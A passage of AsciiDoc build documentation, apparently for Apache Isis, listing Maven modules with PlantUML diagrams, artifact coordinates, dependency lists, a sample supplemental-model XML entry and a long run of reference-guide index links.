#438dd5\n FontColor #fffffe\n BorderColor 
#2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Root\\n[Software System]\" {\n rectangle \"==Apache Isis\\n<size:10>[Container: packaging: pom]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis (Aggregator)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis - Antora\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Supplemental - Legal Info\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n}\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Root)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis (Aggregator)\n[source,yaml]\n----\nGroup: org.apache.isis\nArtifact: isis-all\nType: pom\nDirectory: \/\n----\n|Convenience aggregator POM that references all modules, some explicitly,\nothers via profiles that are not activated by default.\nThe parent POM of the core framework is isis-parent\/pom.xml.\n\n|Apache Isis - Antora\n[source,yaml]\n----\nGroup: org.apache.isis\nArtifact: antora\nType: pom\nDirectory: \/antora\n----\n|\n\n|Apache Isis\n[source,yaml]\n----\nGroup: org.apache.isis\nArtifact: isis-parent\nType: pom\nDirectory: \/isis-parent\n----\n|Parent for the core framework + extensions; starter parent pom for starter apps.\n\n|Apache Isis Supplemental - Legal Info\n[source,yaml]\n----\nGroup: org.apache.isis\nArtifact: supplemental-model\nType: jar\nDirectory: \/supplemental-model\n----\n|For example, the templates used by many Apache distributions assemble a listing of project dependencies\naccording to their organization name (and URL), along with the URL of each project's website. When dependency\nPOMs are missing this information, the dependency notice file that the Remote Resources Plugin renders can\nbe invalid.\nTo compensate for incomplete dependency POMs, we use the supplemental models support.
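\n\nA hypothetical supplemental model entry (as used with the Maven Remote Resources Plugin) is sketched below, filling in organization details for a dependency whose POM omits them; the coordinates are invented for illustration:\n\n[source,xml]\n----\n<supplementalDataModels>\n  <supplement>\n    <project>\n      <!-- hypothetical coordinates; supplies the organization info the real POM omits -->\n      <groupId>com.example<\/groupId>\n      <artifactId>example-library<\/artifactId>\n      <organization>\n        <name>Example Organization<\/name>\n        <url>https:\/\/example.org\/<\/url>\n      <\/organization>\n    <\/project>\n  <\/supplement>\n<\/supplementalDataModels>\n----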
\n|===\n\n== Commons\n\n[plantuml,Commons,svg]\n----\n@startuml(id=Commons)\ntitle Commons - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Commons\\n[Software System]\" {\n rectangle \"==Apache Isis Commons\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Commons)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Commons\n[source,yaml]\n----\nGroup: org.apache.isis.commons\nArtifact: isis-commons\nType: jar\nDirectory: \/commons\n----\n|Apache Isis Commons is a library of utilities that are shared across the entire Apache Isis ecosystem.\n\n.Dependencies\n****\ncom.fasterxml.jackson.core:jackson-databind:jar:<managed> +\ncom.google.code.findbugs:annotations:jar:<managed> +\njavax:javaee-api:jar:<managed> +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> +\norg.junit.jupiter:junit-jupiter-engine:jar:<managed> +\norg.junit.jupiter:junit-jupiter-params:jar:<managed> +\norg.junit.vintage:junit-vintage-engine:jar:<managed> +\norg.slf4j:slf4j-api:jar:<managed> +\norg.springframework:spring-context:jar:<managed> +\norg.springframework:spring-tx:jar:<managed> +\norg.springframework.boot:spring-boot-starter:jar:<managed> +\norg.springframework.boot:spring-boot-starter-log4j2:jar:<managed> +\norg.yaml:snakeyaml:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:commons:index\/collections\/Can.adoc[Can], xref:refguide:commons:index\/collections\/Cardinality.adoc[Cardinality], xref:refguide:commons:index\/functional\/Result.adoc[Result], xref:refguide:commons:index\/resource\/ResourceCoordinates.adoc[ResourceCoordinates]\n****\n|===\n\n== Core\n\n[plantuml,Core,svg]\n----\n@startuml(id=Core)\ntitle Core - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<11>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<12>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<13>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<14>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<15>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam 
rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<10>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core\\n[Software System]\" {\n rectangle \"==Apache Isis - JDK Supplemental\\n<size:10>[Container: packaging: pom]<\/size>\" <<14>> as 14\n rectangle \"==Apache Isis Core\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Core - AppLib\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Core - Code Gen (ByteBuddy)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Core - Configuration\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Core - Interaction\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Core - MetaModel\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Core - Runtime\\n<size:10>[Container: packaging: jar]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Core - Runtime Services\\n<size:10>[Container: packaging: jar]<\/size>\" <<10>> as 10\n rectangle \"==Apache Isis Core - Schemas\\n<size:10>[Container: packaging: jar]<\/size>\" <<15>> as 15\n rectangle \"==Apache Isis Core - Security\\n<size:10>[Container: packaging: jar]<\/size>\" <<11>> as 11\n rectangle \"==Apache Isis Core - Transaction\\n<size:10>[Container: packaging: jar]<\/size>\" <<12>> as 12\n rectangle \"==Apache Isis Core - Unit Test Support\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Core - WebApp\\n<size:10>[Container: packaging: jar]<\/size>\" <<13>> as 13\n}\n2 .[#707070].> 14 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 8 : \"\"\n2 .[#707070].> 9 : \"\"\n2 .[#707070].> 10 : \"\"\n2 .[#707070].> 15 : \"\"\n2 .[#707070].> 11 : \"\"\n2 .[#707070].> 12 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 13 : \"\"\n@enduml\n----\n.Projects\/Modules (Core)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Core\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core\nType: pom\nDirectory: \/core\n----\n|Core framework, providing metamodel, runtime and core APIs.\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Core - AppLib\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-applib\nType: jar\nDirectory: \/api\/applib\n----\n|Isis application library, defining annotations and utilities for the\ndefault (Java) programming model.\n\n.Components\n****\no.a.i.applib.annotation.DomainObject +\no.a.i.applib.annotation.DomainService +\no.a.i.applib.services.commanddto.conmap.ContentMappingServiceForCommandDto +\no.a.i.applib.services.commanddto.conmap.ContentMappingServiceForCommandsDto +\no.a.i.applib.services.commanddto.processor.spi.CommandDtoProcessorServiceIdentity +\no.a.i.applib.services.publishing.log.CommandLogger +\no.a.i.applib.services.publishing.log.EntityChangesLogger +\no.a.i.applib.services.publishing.log.EntityPropertyChangeLogger +\no.a.i.applib.services.publishing.log.ExecutionLogger +\no.a.i.applib.services.session.SessionLoggingServiceLogging +\n****\n\n.Dependencies\n****\ncom.google.code.findbugs:annotations:jar:<managed> +\njavax:javaee-api:jar:<managed> 
+\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.assertj:assertj-core:jar:<managed> +\norg.jmock:jmock:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:applib:index\/AbstractViewModel.adoc[AbstractViewModel], xref:refguide:applib:index\/Identifier.adoc[Identifier], xref:refguide:applib:index\/IsisModuleApplib.adoc[IsisModuleApplib], xref:refguide:applib:index\/RecreatableDomainObject.adoc[RecreatableDomainObject], xref:refguide:applib:index\/ViewModel.adoc[ViewModel], xref:refguide:applib:index\/adapters\/AbstractValueSemanticsProvider.adoc[AbstractValueSemanticsProvider], xref:refguide:applib:index\/adapters\/DefaultsProvider.adoc[DefaultsProvider], xref:refguide:applib:index\/adapters\/EncoderDecoder.adoc[EncoderDecoder], xref:refguide:applib:index\/adapters\/EncodingException.adoc[EncodingException], xref:refguide:applib:index\/adapters\/Parser.adoc[Parser], xref:refguide:applib:index\/adapters\/ParsingException.adoc[ParsingException], xref:refguide:applib:index\/adapters\/ValueSemanticsProvider.adoc[ValueSemanticsProvider], xref:refguide:applib:index\/annotation\/Action.adoc[Action], xref:refguide:applib:index\/annotation\/ActionLayout.adoc[ActionLayout], xref:refguide:applib:index\/annotation\/BookmarkPolicy.adoc[BookmarkPolicy], xref:refguide:applib:index\/annotation\/Bounding.adoc[Bounding], xref:refguide:applib:index\/annotation\/Collection.adoc[Collection], xref:refguide:applib:index\/annotation\/CollectionLayout.adoc[CollectionLayout], xref:refguide:applib:index\/annotation\/Defaulted.adoc[Defaulted], xref:refguide:applib:index\/annotation\/DomainObject.adoc[DomainObject], xref:refguide:applib:index\/annotation\/DomainObjectLayout.adoc[DomainObjectLayout], xref:refguide:applib:index\/annotation\/DomainService.adoc[DomainService], xref:refguide:applib:index\/annotation\/DomainServiceLayout.adoc[DomainServiceLayout], xref:refguide:applib:index\/annotation\/DomainServiceLayout~MenuBar.adoc[DomainServiceLayout.MenuBar], xref:refguide:applib:index\/annotation\/Editing.adoc[Editing], xref:refguide:applib:index\/annotation\/EntityChangeKind.adoc[EntityChangeKind], xref:refguide:applib:index\/annotation\/EqualByContent.adoc[EqualByContent], xref:refguide:applib:index\/annotation\/Facets.adoc[Facets], xref:refguide:applib:index\/annotation\/HomePage.adoc[HomePage], xref:refguide:applib:index\/annotation\/InteractionScope.adoc[InteractionScope], xref:refguide:applib:index\/annotation\/LabelPosition.adoc[LabelPosition], xref:refguide:applib:index\/annotation\/MemberOrder.adoc[MemberOrder], xref:refguide:applib:index\/annotation\/MinLength.adoc[MinLength], xref:refguide:applib:index\/annotation\/Module.adoc[Module], xref:refguide:applib:index\/annotation\/Nature.adoc[Nature], xref:refguide:applib:index\/annotation\/NatureOfService.adoc[NatureOfService], xref:refguide:applib:index\/annotation\/Navigable.adoc[Navigable], xref:refguide:applib:index\/annotation\/Optionality.adoc[Optionality], xref:refguide:applib:index\/annotation\/OrderPrecedence.adoc[OrderPrecedence], xref:refguide:applib:index\/annotation\/Parameter.adoc[Parameter], xref:refguide:applib:index\/annotation\/ParameterLayout.adoc[ParameterLayout], xref:refguide:applib:index\/annotation\/Programmatic.adoc[Programmatic], xref:refguide:applib:index\/annotation\/Projecting.adoc[Projecting], xref:refguide:applib:index\/annotation\/PromptStyle.adoc[PromptStyle], 
xref:refguide:applib:index\/annotation\/Property.adoc[Property], xref:refguide:applib:index\/annotation\/PropertyLayout.adoc[PropertyLayout], xref:refguide:applib:index\/annotation\/Publishing.adoc[Publishing], xref:refguide:applib:index\/annotation\/Redirect.adoc[Redirect], xref:refguide:applib:index\/annotation\/RenderDay.adoc[RenderDay], xref:refguide:applib:index\/annotation\/Repainting.adoc[Repainting], xref:refguide:applib:index\/annotation\/RestrictTo.adoc[RestrictTo], xref:refguide:applib:index\/annotation\/SemanticsOf.adoc[SemanticsOf], xref:refguide:applib:index\/annotation\/Snapshot.adoc[Snapshot], xref:refguide:applib:index\/annotation\/Title.adoc[Title], xref:refguide:applib:index\/annotation\/Value.adoc[Value], xref:refguide:applib:index\/annotation\/Where.adoc[Where], xref:refguide:applib:index\/client\/RepresentationTypeSimplifiedV2.adoc[RepresentationTypeSimplifiedV2], xref:refguide:applib:index\/client\/SuppressionType.adoc[SuppressionType], xref:refguide:applib:index\/clock\/VirtualClock.adoc[VirtualClock], xref:refguide:applib:index\/domain\/DomainObjectList.adoc[DomainObjectList], xref:refguide:applib:index\/events\/EventObjectBase.adoc[EventObjectBase], xref:refguide:applib:index\/events\/domain\/AbstractDomainEvent.adoc[AbstractDomainEvent], xref:refguide:applib:index\/events\/domain\/ActionDomainEvent.adoc[ActionDomainEvent], xref:refguide:applib:index\/events\/domain\/CollectionDomainEvent.adoc[CollectionDomainEvent], xref:refguide:applib:index\/events\/domain\/PropertyDomainEvent.adoc[PropertyDomainEvent], xref:refguide:applib:index\/events\/lifecycle\/AbstractLifecycleEvent.adoc[AbstractLifecycleEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectCreatedEvent.adoc[ObjectCreatedEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectLoadedEvent.adoc[ObjectLoadedEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectPersistedEvent.adoc[ObjectPersistedEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectPersistingEvent.adoc[ObjectPersistingEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectRemovingEvent.adoc[ObjectRemovingEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectUpdatedEvent.adoc[ObjectUpdatedEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectUpdatingEvent.adoc[ObjectUpdatingEvent], xref:refguide:applib:index\/events\/ui\/AbstractUiEvent.adoc[AbstractUiEvent], xref:refguide:applib:index\/events\/ui\/CssClassUiEvent.adoc[CssClassUiEvent], xref:refguide:applib:index\/events\/ui\/IconUiEvent.adoc[IconUiEvent], xref:refguide:applib:index\/events\/ui\/LayoutUiEvent.adoc[LayoutUiEvent], xref:refguide:applib:index\/events\/ui\/TitleUiEvent.adoc[TitleUiEvent], xref:refguide:applib:index\/exceptions\/RecoverableException.adoc[RecoverableException], xref:refguide:applib:index\/exceptions\/TranslatableException.adoc[TranslatableException], xref:refguide:applib:index\/exceptions\/UnrecoverableException.adoc[UnrecoverableException], xref:refguide:applib:index\/exceptions\/unrecoverable\/DomainModelException.adoc[DomainModelException], xref:refguide:applib:index\/exceptions\/unrecoverable\/MetaModelException.adoc[MetaModelException], xref:refguide:applib:index\/exceptions\/unrecoverable\/NoAuthenticatorException.adoc[NoAuthenticatorException], xref:refguide:applib:index\/exceptions\/unrecoverable\/ObjectNotFoundException.adoc[ObjectNotFoundException], xref:refguide:applib:index\/exceptions\/unrecoverable\/ObjectPersistenceException.adoc[ObjectPersistenceException], 
xref:refguide:applib:index\/exceptions\/unrecoverable\/PersistFailedException.adoc[PersistFailedException], xref:refguide:applib:index\/exceptions\/unrecoverable\/ReflectiveActionException.adoc[ReflectiveActionException], xref:refguide:applib:index\/exceptions\/unrecoverable\/RepositoryException.adoc[RepositoryException], xref:refguide:applib:index\/exceptions\/unrecoverable\/UnexpectedCallException.adoc[UnexpectedCallException], xref:refguide:applib:index\/exceptions\/unrecoverable\/UnknownTypeException.adoc[UnknownTypeException], xref:refguide:applib:index\/graph\/Edge.adoc[Edge], xref:refguide:applib:index\/graph\/SimpleEdge.adoc[SimpleEdge], xref:refguide:applib:index\/graph\/Vertex.adoc[Vertex], xref:refguide:applib:index\/graph\/tree\/LazyTreeNode.adoc[LazyTreeNode], xref:refguide:applib:index\/graph\/tree\/TreeAdapter.adoc[TreeAdapter], xref:refguide:applib:index\/graph\/tree\/TreeNode.adoc[TreeNode], xref:refguide:applib:index\/graph\/tree\/TreePath.adoc[TreePath], xref:refguide:applib:index\/graph\/tree\/TreeState.adoc[TreeState], xref:refguide:applib:index\/id\/HasLogicalType.adoc[HasLogicalType], xref:refguide:applib:index\/id\/LogicalType.adoc[LogicalType], xref:refguide:applib:index\/jaxb\/DataTypeFactory.adoc[DataTypeFactory], xref:refguide:applib:index\/jaxb\/JavaSqlJaxbAdapters.adoc[JavaSqlJaxbAdapters], xref:refguide:applib:index\/jaxb\/JavaSqlXMLGregorianCalendarMarshalling.adoc[JavaSqlXMLGregorianCalendarMarshalling], xref:refguide:applib:index\/jaxb\/JavaTimeJaxbAdapters.adoc[JavaTimeJaxbAdapters], xref:refguide:applib:index\/jaxb\/JavaTimeXMLGregorianCalendarMarshalling.adoc[JavaTimeXMLGregorianCalendarMarshalling], xref:refguide:applib:index\/jaxb\/JavaUtilJaxbAdapters.adoc[JavaUtilJaxbAdapters], xref:refguide:applib:index\/jaxb\/JodaTimeJaxbAdapters.adoc[JodaTimeJaxbAdapters], xref:refguide:applib:index\/jaxb\/JodaTimeXMLGregorianCalendarMarshalling.adoc[JodaTimeXMLGregorianCalendarMarshalling], xref:refguide:applib:index\/jaxb\/PersistentEntitiesAdapter.adoc[PersistentEntitiesAdapter], xref:refguide:applib:index\/jaxb\/PersistentEntityAdapter.adoc[PersistentEntityAdapter], xref:refguide:applib:index\/jaxb\/PrimitiveJaxbAdapters.adoc[PrimitiveJaxbAdapters], xref:refguide:applib:index\/layout\/component\/ActionLayoutData.adoc[ActionLayoutData], xref:refguide:applib:index\/layout\/component\/ActionLayoutDataOwner.adoc[ActionLayoutDataOwner], xref:refguide:applib:index\/layout\/component\/CollectionLayoutData.adoc[CollectionLayoutData], xref:refguide:applib:index\/layout\/component\/CollectionLayoutDataOwner.adoc[CollectionLayoutDataOwner], xref:refguide:applib:index\/layout\/component\/CssClassFaPosition.adoc[CssClassFaPosition], xref:refguide:applib:index\/layout\/component\/DomainObjectLayoutData.adoc[DomainObjectLayoutData], xref:refguide:applib:index\/layout\/component\/DomainObjectLayoutDataOwner.adoc[DomainObjectLayoutDataOwner], xref:refguide:applib:index\/layout\/component\/FieldSet.adoc[FieldSet], xref:refguide:applib:index\/layout\/component\/FieldSetOwner.adoc[FieldSetOwner], xref:refguide:applib:index\/layout\/component\/HasBookmarking.adoc[HasBookmarking], xref:refguide:applib:index\/layout\/component\/HasCssClass.adoc[HasCssClass], xref:refguide:applib:index\/layout\/component\/HasCssClassFa.adoc[HasCssClassFa], xref:refguide:applib:index\/layout\/component\/HasDescribedAs.adoc[HasDescribedAs], xref:refguide:applib:index\/layout\/component\/HasHidden.adoc[HasHidden], xref:refguide:applib:index\/layout\/component\/HasNamed.adoc[HasNamed], 
xref:refguide:applib:index\/layout\/component\/MemberRegion.adoc[MemberRegion], xref:refguide:applib:index\/layout\/component\/MemberRegionOwner.adoc[MemberRegionOwner], xref:refguide:applib:index\/layout\/component\/Owned.adoc[Owned], xref:refguide:applib:index\/layout\/component\/Owner.adoc[Owner], xref:refguide:applib:index\/layout\/component\/PropertyLayoutData.adoc[PropertyLayoutData], xref:refguide:applib:index\/layout\/component\/ServiceActionLayoutData.adoc[ServiceActionLayoutData], xref:refguide:applib:index\/layout\/component\/ServiceActionLayoutDataOwner.adoc[ServiceActionLayoutDataOwner], xref:refguide:applib:index\/layout\/grid\/Grid.adoc[Grid], xref:refguide:applib:index\/layout\/grid\/GridAbstract.adoc[GridAbstract], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3ClearFix.adoc[BS3ClearFix], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3ClearFixHidden.adoc[BS3ClearFixHidden], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3ClearFixVisible.adoc[BS3ClearFixVisible], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3Col.adoc[BS3Col], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3Element.adoc[BS3Element], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3ElementAbstract.adoc[BS3ElementAbstract], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3Grid.adoc[BS3Grid], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3Row.adoc[BS3Row], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3RowContent.adoc[BS3RowContent], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3RowContentOwner.adoc[BS3RowContentOwner], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3RowOwner.adoc[BS3RowOwner], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3Tab.adoc[BS3Tab], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3TabGroup.adoc[BS3TabGroup], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3TabGroupOwner.adoc[BS3TabGroupOwner], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3TabOwner.adoc[BS3TabOwner], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/HasCssId.adoc[HasCssId], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/Size.adoc[Size], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/SizeSpan.adoc[SizeSpan], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/WithinGrid.adoc[WithinGrid], xref:refguide:applib:index\/layout\/links\/Link.adoc[Link], xref:refguide:applib:index\/layout\/menubars\/HasNamed.adoc[HasNamed], xref:refguide:applib:index\/layout\/menubars\/Menu.adoc[Menu], xref:refguide:applib:index\/layout\/menubars\/MenuBar.adoc[MenuBar], xref:refguide:applib:index\/layout\/menubars\/MenuBars.adoc[MenuBars], xref:refguide:applib:index\/layout\/menubars\/MenuBarsAbstract.adoc[MenuBarsAbstract], xref:refguide:applib:index\/layout\/menubars\/MenuSection.adoc[MenuSection], xref:refguide:applib:index\/layout\/menubars\/bootstrap3\/BS3Menu.adoc[BS3Menu], xref:refguide:applib:index\/layout\/menubars\/bootstrap3\/BS3MenuBar.adoc[BS3MenuBar], xref:refguide:applib:index\/layout\/menubars\/bootstrap3\/BS3MenuBars.adoc[BS3MenuBars], xref:refguide:applib:index\/layout\/menubars\/bootstrap3\/BS3MenuSection.adoc[BS3MenuSection], xref:refguide:applib:index\/mixins\/dto\/Dto.adoc[Dto], xref:refguide:applib:index\/mixins\/dto\/DtoMixinConstants.adoc[DtoMixinConstants], xref:refguide:applib:index\/mixins\/dto\/Dto_downloadXml.adoc[Dto_downloadXml], xref:refguide:applib:index\/mixins\/dto\/Dto_downloadXsd.adoc[Dto_downloadXsd], 
xref:refguide:applib:index\/mixins\/layout\/LayoutMixinConstants.adoc[LayoutMixinConstants], xref:refguide:applib:index\/mixins\/layout\/Object_downloadLayoutXml.adoc[Object_downloadLayoutXml], xref:refguide:applib:index\/mixins\/metamodel\/Object_downloadMetamodelXml.adoc[Object_downloadMetamodelXml], xref:refguide:applib:index\/mixins\/metamodel\/Object_objectIdentifier.adoc[Object_objectIdentifier], xref:refguide:applib:index\/mixins\/metamodel\/Object_objectType.adoc[Object_objectType], xref:refguide:applib:index\/mixins\/metamodel\/Object_rebuildMetamodel.adoc[Object_rebuildMetamodel], xref:refguide:applib:index\/mixins\/rest\/Object_openRestApi.adoc[Object_openRestApi], xref:refguide:applib:index\/mixins\/security\/HasUsername.adoc[HasUsername], xref:refguide:applib:index\/mixins\/system\/DomainChangeRecord.adoc[DomainChangeRecord], xref:refguide:applib:index\/mixins\/system\/DomainChangeRecord_openTargetObject.adoc[DomainChangeRecord_openTargetObject], xref:refguide:applib:index\/mixins\/system\/DomainChangeRecord~ChangeType.adoc[DomainChangeRecord.ChangeType], xref:refguide:applib:index\/mixins\/system\/HasInteractionId.adoc[HasInteractionId], xref:refguide:applib:index\/mixins\/system\/HasTransactionId.adoc[HasTransactionId], xref:refguide:applib:index\/mixins\/updates\/OnUpdatedAt.adoc[OnUpdatedAt], xref:refguide:applib:index\/mixins\/updates\/OnUpdatedBy.adoc[OnUpdatedBy], xref:refguide:applib:index\/mixins\/updates\/OnUpdatedByAndAt.adoc[OnUpdatedByAndAt], xref:refguide:applib:index\/query\/AllInstancesQuery.adoc[AllInstancesQuery], xref:refguide:applib:index\/query\/NamedQuery.adoc[NamedQuery], xref:refguide:applib:index\/query\/Query.adoc[Query], xref:refguide:applib:index\/query\/QueryRange.adoc[QueryRange], xref:refguide:applib:index\/services\/acceptheader\/AcceptHeaderService.adoc[AcceptHeaderService], xref:refguide:applib:index\/services\/appfeat\/ApplicationFeature.adoc[ApplicationFeature], xref:refguide:applib:index\/services\/appfeat\/ApplicationFeatureId.adoc[ApplicationFeatureId], xref:refguide:applib:index\/services\/appfeat\/ApplicationFeatureRepository.adoc[ApplicationFeatureRepository], xref:refguide:applib:index\/services\/appfeat\/ApplicationFeatureSort.adoc[ApplicationFeatureSort], xref:refguide:applib:index\/services\/appfeat\/ApplicationMemberSort.adoc[ApplicationMemberSort], xref:refguide:applib:index\/services\/bookmark\/Bookmark.adoc[Bookmark], xref:refguide:applib:index\/services\/bookmark\/BookmarkHolder.adoc[BookmarkHolder], xref:refguide:applib:index\/services\/bookmark\/BookmarkHolder_lookup.adoc[BookmarkHolder_lookup], xref:refguide:applib:index\/services\/bookmark\/BookmarkHolder_object.adoc[BookmarkHolder_object], xref:refguide:applib:index\/services\/bookmark\/BookmarkService.adoc[BookmarkService], xref:refguide:applib:index\/services\/bookmarkui\/BookmarkUiService.adoc[BookmarkUiService], xref:refguide:applib:index\/services\/clock\/ClockService.adoc[ClockService], xref:refguide:applib:index\/services\/command\/Command.adoc[Command], xref:refguide:applib:index\/services\/command\/CommandExecutorService.adoc[CommandExecutorService], xref:refguide:applib:index\/services\/command\/CommandOutcomeHandler.adoc[CommandOutcomeHandler], xref:refguide:applib:index\/services\/commanddto\/HasCommandDto.adoc[HasCommandDto], xref:refguide:applib:index\/services\/commanddto\/conmap\/ContentMappingServiceForCommandDto.adoc[ContentMappingServiceForCommandDto], 
xref:refguide:applib:index\/services\/commanddto\/conmap\/ContentMappingServiceForCommandsDto.adoc[ContentMappingServiceForCommandsDto], xref:refguide:applib:index\/services\/commanddto\/conmap\/UserDataKeys.adoc[UserDataKeys], xref:refguide:applib:index\/services\/commanddto\/processor\/CommandDtoProcessor.adoc[CommandDtoProcessor], xref:refguide:applib:index\/services\/commanddto\/processor\/CommandDtoProcessorForActionAbstract.adoc[CommandDtoProcessorForActionAbstract], xref:refguide:applib:index\/services\/commanddto\/processor\/CommandDtoProcessorForPropertyAbstract.adoc[CommandDtoProcessorForPropertyAbstract], xref:refguide:applib:index\/services\/commanddto\/processor\/spi\/CommandDtoProcessorService.adoc[CommandDtoProcessorService], xref:refguide:applib:index\/services\/commanddto\/processor\/spi\/CommandDtoProcessorServiceIdentity.adoc[CommandDtoProcessorServiceIdentity], xref:refguide:applib:index\/services\/confview\/ConfigurationMenu.adoc[ConfigurationMenu], xref:refguide:applib:index\/services\/confview\/ConfigurationProperty.adoc[ConfigurationProperty], xref:refguide:applib:index\/services\/confview\/ConfigurationViewService.adoc[ConfigurationViewService], xref:refguide:applib:index\/services\/conmap\/ContentMappingService.adoc[ContentMappingService], xref:refguide:applib:index\/services\/email\/EmailService.adoc[EmailService], xref:refguide:applib:index\/services\/error\/ErrorDetails.adoc[ErrorDetails], xref:refguide:applib:index\/services\/error\/ErrorReportingService.adoc[ErrorReportingService], xref:refguide:applib:index\/services\/error\/SimpleTicket.adoc[SimpleTicket], xref:refguide:applib:index\/services\/error\/Ticket.adoc[Ticket], xref:refguide:applib:index\/services\/eventbus\/EventBusService.adoc[EventBusService], xref:refguide:applib:index\/services\/exceprecog\/Category.adoc[Category], xref:refguide:applib:index\/services\/exceprecog\/ExceptionRecognizer.adoc[ExceptionRecognizer], xref:refguide:applib:index\/services\/exceprecog\/ExceptionRecognizerAbstract.adoc[ExceptionRecognizerAbstract], 